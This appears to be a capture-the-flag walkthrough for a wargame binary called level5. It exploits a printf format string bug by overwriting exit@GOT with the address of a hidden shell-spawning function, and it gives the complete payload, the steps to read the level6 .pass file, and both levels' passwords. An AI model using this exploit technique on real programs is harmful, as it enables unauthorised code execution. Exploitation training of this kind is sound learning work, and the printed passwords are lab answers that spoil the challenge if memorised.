1. Download the binary from the server:
   scp -P 2222 level5@localhost:~/level5 .
   Password: 0f99ba5e9c446258a69b290407a6c60859e9c2d25b26575cafc9ae6d75e9456a

2. Analyze the binary with Ghidra:
   - printf(buffer) format string vulnerability in n()
   - exit(1) is called immediately after printf
   - Hidden function o() at 0x080484a4 that spawns shell
   - exit@GOT located at 0x08049838

3. Connect to the VM via SSH:
   ssh level5@localhost -p 2222
   Password: 0f99ba5e9c446258a69b290407a6c60859e9c2d25b26575cafc9ae6d75e9456a

4. Find the stack position of your input:
   python -c 'print "AAAA" + "%x."*20' | ./level5
   Look for 41414141 -> Position 4

5. Calculate the GOT overwrite payload:
   Target: Write 0x080484a4 (address of o) to 0x08049838 (exit@GOT)
   
   Break into two 16-bit writes:
   - Upper word (0x0804983a): 0x0804 = 2,052 decimal
   - Lower word (0x08049838): 0x84a4 = 33,956 decimal
   
   Write in ascending order:
   - Write 2,052 to 0x0804983a (position 4)
   - Write 33,956 to 0x08049838 (position 5)

6. Execute the exploit:
   (python -c 'print "\x3a\x98\x04\x08" + "\x38\x98\x04\x08" + "%2044x%4$hn%31904x%5$hn"'; cat) | ./level5

7. Get the password:
   cat /home/user/level6/.pass

8. Password: d3b7bf1025225bd715fa8ccb54ef06ca70b9125ac855aeab4878217177f41a31

9. Exit and login as level6:
   su level6
